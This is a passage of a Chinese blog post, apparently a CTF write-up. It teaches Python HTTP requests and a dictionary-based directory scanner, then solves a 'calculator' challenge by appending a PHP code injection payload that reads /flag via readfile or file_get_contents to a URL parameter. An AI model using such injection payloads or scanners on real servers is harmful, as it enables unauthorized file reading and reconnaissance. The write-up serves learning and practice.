mod_fcgid/2.3.9&#x27;</span>, <span class="string">&#x27;X-Powered-By&#x27;</span>: <span class="string">&#x27;PHP/7.0.12&#x27;</span>, <span class="string">&#x27;Keep-Alive&#x27;</span>: <span class="string">&#x27;timeout=5, max=100&#x27;</span>, <span class="string">&#x27;Connection&#x27;</span>: <span class="string">&#x27;Keep-Alive&#x27;</span>, <span class="string">&#x27;Transfer-Encoding&#x27;</span>: <span class="string">&#x27;chunked&#x27;</span>, <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;text/html; charset=UTF-8&#x27;</span>&#125;</span><br><span class="line">&#123;<span class="string">&#x27;User-Agent&#x27;</span>: <span class="string">&#x27;python-requests/2.24.0&#x27;</span>, <span class="string">&#x27;Accept-Encoding&#x27;</span>: <span class="string">&#x27;gzip, deflate&#x27;</span>, <span class="string">&#x27;Accept&#x27;</span>: <span class="string">&#x27;*/*&#x27;</span>, <span class="string">&#x27;Connection&#x27;</span>: <span class="string">&#x27;keep-alive&#x27;</span>&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Python-会话编程"><a href="#Python-会话编程" class="headerlink" title="Python 会话编程"></a>Python 会话编程</h3><h4 id="携带Cookie的会话"><a href="#携带Cookie的会话" class="headerlink" title="携带Cookie的会话"></a>携带Cookie的会话</h4><p>访问某些页面时，会通过Set-Cookie设置Cookie值，以便下一次访问自动提交Cookie进行身份验证</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;https://www.baidu.com&quot;</span></span><br><span class="line">s = requests.Session()</span><br><span class="line">r = s.get(url)</span><br><span class="line">print(r.cookies)</span><br><span class="line">print(r.request.headers)</span><br><span class="line"></span><br><span class="line">r1=s.get(url)</span><br><span class="line">print(r1.request.headers)</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;RequestsCookieJar[&lt;Cookie BDORZ=<span class="number">27315</span> <span class="keyword">for</span> .baidu.com/&gt;]&gt;</span><br><span class="line">&#123;<span class="string">&#x27;User-Agent&#x27;</span>: <span class="string">&#x27;python-requests/2.24.0&#x27;</span>, <span class="string">&#x27;Accept-Encoding&#x27;</span>: <span class="string">&#x27;gzip, deflate&#x27;</span>, <span class="string">&#x27;Accept&#x27;</span>: <span class="string">&#x27;*/*&#x27;</span>, <span class="string">&#x27;Connection&#x27;</span>: <span class="string">&#x27;keep-alive&#x27;</span>&#125;</span><br><span class="line"></span><br><span class="line">&#123;<span class="string">&#x27;User-Agent&#x27;</span>: <span class="string">&#x27;python-requests/2.24.0&#x27;</span>, <span class="string">&#x27;Accept-Encoding&#x27;</span>: <span class="string">&#x27;gzip, deflate&#x27;</span>, <span class="string">&#x27;Accept&#x27;</span>: <span class="string">&#x27;*/*&#x27;</span>, <span class="string">&#x27;Connection&#x27;</span>: <span class="string">&#x27;keep-alive&#x27;</span>, <span class="string">&#x27;Cookie&#x27;</span>: <span class="string">&#x27;BDORZ=27315&#x27;</span>&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Python目录扫描工具"><a href="#Python目录扫描工具" class="headerlink" title="Python目录扫描工具"></a>Python目录扫描工具</h3><h4 id="目录扫描原理"><a href="#目录扫描原理" class="headerlink" title="目录扫描原理"></a>目录扫描原理</h4><p>读取字典文件，拼接URL</p>
<p>HTTP GET读取URL</p>
<p>判断状态码 输出存在目录</p>
<p>（如果状态码是200，则当前目录存在，如果状态码是404，则当前页面不存在）</p>
<h4 id="字典文件读取"><a href="#字典文件读取" class="headerlink" title="字典文件读取"></a>字典文件读取</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">with open (&quot;filename.txt&quot;,&quot;r&quot;)as f:</span><br><span class="line">&#x2F;&#x2F;with open ： 用完后自动关闭文件，省去了手动添加f.close()功能</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">f.readline()	读取第一行的内容</span><br><span class="line">f.readlines()	读取文件里面所有内容，把每行的内容放到一个list里面</span><br><span class="line">f.read()  在（）里输入需要读取的字节数，如果不指定字节数，则会输出文件的所有内容</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">f = open(<span class="string">&quot;1.txt&quot;</span>,<span class="string">&quot;r&quot;</span>)</span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> f.readlines():</span><br><span class="line">	print(line)</span><br><span class="line"> </span><br><span class="line">	</span><br><span class="line"><span class="comment">#Hello</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#World</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#haha</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">f = open(<span class="string">&quot;1.txt&quot;</span>,<span class="string">&quot;r&quot;</span>)	</span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> f.readlines():</span><br><span class="line">	print(line.strip())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Hello</span><br><span class="line">World</span><br><span class="line">haha</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">f = open(<span class="string">&quot;1.txt&quot;</span>,<span class="string">&quot;r&quot;</span>)</span><br><span class="line">line1 = f.readline()</span><br><span class="line">print(line1)</span><br><span class="line"></span><br><span class="line"><span class="comment">#Hello</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">f = open(<span class="string">&quot;1.txt&quot;</span>,<span class="string">&quot;r&quot;</span>)</span><br><span class="line">line1 = f.read(<span class="number">4</span>)</span><br><span class="line">print(line1)</span><br><span class="line"></span><br><span class="line"><span class="comment">#Hell</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">f = open(<span class="string">&quot;1.txt&quot;</span>,<span class="string">&quot;r&quot;</span>)</span><br><span class="line">line1 = f.read()</span><br><span class="line">print(line1)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#Hello</span></span><br><span class="line"><span class="comment">#World</span></span><br><span class="line"><span class="comment">#haha</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">with</span> open (<span class="string">&quot;1.txt&quot;</span>,<span class="string">&quot;r&quot;</span>)<span class="keyword">as</span> f:</span><br><span class="line">	<span class="keyword">for</span> line <span class="keyword">in</span> f.readlines():</span><br><span class="line">		print(line)</span><br><span class="line">		</span><br><span class="line"><span class="comment">#Hello</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#World</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#haha</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#open(filename,mode)</span></span><br><span class="line"><span class="comment">#mode r=read</span></span><br><span class="line"><span class="comment">#     w 写操作会自动写入内容，并且对之前的内容进行覆盖</span></span><br><span class="line"><span class="comment">#     a 追加</span></span><br><span class="line">    </span><br><span class="line"> </span><br><span class="line">f1 = open(<span class="string">&quot;1.txt&quot;</span>,<span class="string">&quot;w&quot;</span>)</span><br><span class="line">f1.write(<span class="string">&#x27;brute&#x27;</span>)</span><br><span class="line">f1.close()</span><br><span class="line"></span><br><span class="line">f2=open(<span class="string">&quot;1.txt&quot;</span>)</span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> f2.readlines():</span><br><span class="line">	print(line.strip())</span><br><span class="line">	f2.close()</span><br><span class="line">    </span><br><span class="line"><span class="comment">#brute</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="工具编写"><a href="#工具编写" class="headerlink" title="工具编写"></a>工具编写</h4><p>读取字典文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://127.0.0.1/&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> open (<span class="string">&quot;1.txt&quot;</span>,<span class="string">&quot;r&quot;</span>)<span class="keyword">as</span> f:</span><br><span class="line">	<span class="keyword">for</span> line <span class="keyword">in</span> f.readlines():</span><br><span class="line">		line = line.strip()</span><br><span class="line">		r = requests.get(url+line)</span><br><span class="line">		<span class="keyword">if</span> r.status_code == <span class="number">200</span>:</span><br><span class="line">			print(<span class="string">&quot;url:&quot;</span>+r.url)</span><br><span class="line">            </span><br><span class="line"><span class="comment">#1.txt是字典文件，</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#1.txt</span><br><span class="line">Hello</span><br><span class="line">World</span><br><span class="line">haha</span><br><span class="line">app</span><br></pre></td></tr></table></figure>

<p>因为网站跟目录里面有一个app的文件夹，所以返回</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url:http:&#x2F;&#x2F;127.0.0.1&#x2F;app&#x2F;</span><br></pre></td></tr></table></figure>

<p><img src="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/6.png"></p>
<p>因为网站根目录里面没有Hello，World，haha的文件夹，所以会返回404</p>
<p>存在app的文件夹，所以会返回200</p>
<h4 id="参数优化"><a href="#参数优化" class="headerlink" title="参数优化"></a>参数优化</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">argv是sys模块的一个全局变量，也称sys模块的一个属性！argv本身为一个list类型的对象，Sys.argv[]是用来获取命令行参数的，sys.argv[0]表示代码本身文件路径，所以参数从1开始。argv[1]代表传入的第一个命令行参数</span><br><span class="line"></span><br><span class="line">注意：argv持有的每个元素的类型均为str（字符串）</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">python temp.py a b c d</span><br><span class="line">sys.argv &#x3D;&#x3D; [&quot;temp.py&quot;,&quot;a&quot;,&quot;b&quot;,&quot;c&quot;,&quot;d&quot;]  #sys.argv是持有5个元素的list对象</span><br><span class="line"></span><br><span class="line">sys.argv[0]  &#x3D;&#x3D; &quot;temp.py&quot;   #第1个元素为模块名“temp.py”</span><br><span class="line"></span><br><span class="line">sys.argv[1] &#x3D;&#x3D; &quot;a&quot;               #第2个元素为&quot;a&quot;</span><br><span class="line"></span><br><span class="line">sys.argv[2] &#x3D;&#x3D; &quot;b&quot;               #第3个元素为&quot;b&quot;</span><br><span class="line"></span><br><span class="line">sys.argv[3] &#x3D;&#x3D; &quot;c&quot;               #第4个元素为&quot;c&quot;</span><br><span class="line"></span><br><span class="line">sys.argv[4] &#x3D;&#x3D; &quot;d&quot;               #第5个元素为&quot;d&quot;</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line">url=sys.argv[<span class="number">1</span>]</span><br><span class="line"><span class="comment">#url = &quot;http://127.0.0.1/&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> open (<span class="string">&quot;1.txt&quot;</span>,<span class="string">&quot;r&quot;</span>)<span class="keyword">as</span> f:</span><br><span class="line">	<span class="keyword">for</span> line <span class="keyword">in</span> f.readlines():</span><br><span class="line">		line = line.strip()</span><br><span class="line">		r = requests.get(url+line)</span><br><span class="line">		<span class="comment">#print(r)</span></span><br><span class="line">		<span class="keyword">if</span> r.status_code == <span class="number">200</span>:</span><br><span class="line">			print(<span class="string">&quot;url:&quot;</span>+r.url)</span><br></pre></td></tr></table></figure>

<p><img src="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/7.png"></p>
<h3 id="第二种解法"><a href="#第二种解法" class="headerlink" title="第二种解法"></a>第二种解法</h3><p>有了以上知识，可以开始编写脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import requests  #导入requests模块</span><br><span class="line">import re        #导入re模块</span><br><span class="line">r &#x3D; requests.session();   </span><br><span class="line">result&#x3D;r.get(&quot;http:&#x2F;&#x2F;47.98.234.232:28054&quot;)</span><br><span class="line">print(result.text)</span><br></pre></td></tr></table></figure>

<p><img src="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/8.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">可以得到在&lt;h4&gt;里面就是我们需要利用的内容</span><br><span class="line"></span><br><span class="line">写一个正则匹配&lt;h4&gt;</span><br><span class="line">&lt;h4&gt;(.*?)&lt;&#x2F;h4&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">re.findall  的简单用法（返回string中所有与pattern相匹配的全部字串，返回形式为数组）</span><br></pre></td></tr></table></figure>

<p><img src="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/9.png"></p>
<p><strong>url拼接</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">import requests  #导入requests模块</span><br><span class="line">import re        #导入re模块</span><br><span class="line">r &#x3D; requests.session();   </span><br><span class="line">result&#x3D;r.get(&quot;http:&#x2F;&#x2F;47.98.234.232:28054&quot;)</span><br><span class="line">expr&#x3D;re.findall(&quot;&lt;h4&gt;(.*?)&lt;&#x2F;h4&gt;&quot;,result.text)</span><br><span class="line">print(eval(expr[0]))</span><br><span class="line">url&#x3D;&quot;http:&#x2F;&#x2F;47.98.234.232:28054?a&#x3D;%s&quot;%str(eval(expr[0]))+&quot; and print_r(readfile(&#39;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;flag&#39;))&quot;</span><br><span class="line">print(url)</span><br><span class="line">a&#x3D;r.get(url)</span><br><span class="line">if &quot;Try again!&quot; not in a.text:</span><br><span class="line">	print(&quot;yes&quot;)</span><br><span class="line">print(a.text)</span><br></pre></td></tr></table></figure>

<p><img src="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/10.png"></p>
<p><strong>到这里发现不用返回那么多级目录，在文件名前面加一个/就可以了！！！</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url&#x3D;&quot;http:&#x2F;&#x2F;47.98.234.232:28054?a&#x3D;%s&quot;%str(eval(expr[0]))+&quot; and print_r(file_get_contents(&#39;&#x2F;flag&#39;))&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/11.png"></p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/blog/%E7%AE%80%E5%8D%95%E7%9A%84%E8%AE%A1%E7%AE%97%E5%99%A8/12.png"></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/10/31/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" rel="prev" title="文件上传漏洞">
      <i class="fa fa-chevron-left"></i> 文件上传漏洞
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/11/29/linux%E7%B3%BB%E7%BB%9F/" rel="next" title="关于linux的一些知识点">
      关于linux的一些知识点 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%A7%8D%E8%A7%A3%E6%B3%95"><span class="nav-number">1.</span> <span class="nav-text">第一种解法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Python-HTTP%E8%AF%B7%E6%B1%82"><span class="nav-number">2.</span> <span class="nav-text">Python-HTTP请求</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#GET%E8%AF%B7%E6%B1%82"><span class="nav-number">2.1.</span> <span class="nav-text">GET请求</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#POST%E8%AF%B7%E6%B1%82"><span class="nav-number">2.2.</span> <span class="nav-text">POST请求</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%87%AA%E5%AE%9A%E4%B9%89%E8%AF%B7%E6%B1%82%E5%A4%B4"><span class="nav-number">2.3.</span> <span class="nav-text">自定义请求头</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%87%AA%E5%AE%9A%E4%B9%89headers%E5%A4%B4"><span class="nav-number">2.4.</span> <span class="nav-text">自定义headers头</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Python-HTTP%E5%93%8D%E5%BA%94"><span class="nav-number">3.</span> <span class="nav-text">Python-HTTP响应</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E5%93%8D%E5%BA%94%E7%8A%B6%E6%80%81%E7%A0%81"><span class="nav-number">3.1.</span> <span class="nav-text">获取响应状态码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E5%93%8D%E5%BA%94%E6%96%87%E6%9C%AC"><span class="nav-number">3.2.</span> <span class="nav-text">获取响应文本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E5%93%8D%E5%BA%94%E5%A4%B4"><span class="nav-number">3.3.</span> <span class="nav-text">获取响应头</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Python-%E4%BC%9A%E8%AF%9D%E7%BC%96%E7%A8%8B"><span class="nav-number">4.</span> <span class="nav-text">Python 会话编程</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%90%BA%E5%B8%A6Cookie%E7%9A%84%E4%BC%9A%E8%AF%9D"><span class="nav-number">4.1.</span> <span class="nav-text">携带Cookie的会话</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Python%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E5%B7%A5%E5%85%B7"><span class="nav-number">5.</span> <span class="nav-text">Python目录扫描工具</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E5%8E%9F%E7%90%86"><span class="nav-number">5.1.</span> <span class="nav-text">目录扫描原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AD%97%E5%85%B8%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96"><span class="nav-number">5.2.</span> <span class="nav-text">字典文件读取</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B7%A5%E5%85%B7%E7%BC%96%E5%86%99"><span class="nav-number">5.3.</span> <span class="nav-text">工具编写</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%82%E6%95%B0%E4%BC%98%E5%8C%96"><span class="nav-number">5.4.</span> <span class="nav-text">参数优化</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E7%A7%8D%E8%A7%A3%E6%B3%95"><span class="nav-number">6.</span> <span class="nav-text">第二种解法</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zoey"
      src="/images/1.jpg">
  <p class="site-author-name" itemprop="name">zoey</p>
  <div class="site-description" itemprop="description">请多指教！</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">20</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      博客链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://yoursite.com/" title="http:&#x2F;&#x2F;yoursite.com" rel="noopener" target="_blank">eeknight</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://flag2020.top/" title="https:&#x2F;&#x2F;flag2020.top&#x2F;" rel="noopener" target="_blank">潜心</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://threelisa.top/" title="https:&#x2F;&#x2F;threelisa.top&#x2F;" rel="noopener" target="_blank">左</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zoey</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">160k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">2:25</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>


        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>
    <script defer src="/lib/three/canvas_sphere.min.js"></script>


  















  

  

</body>
</html>
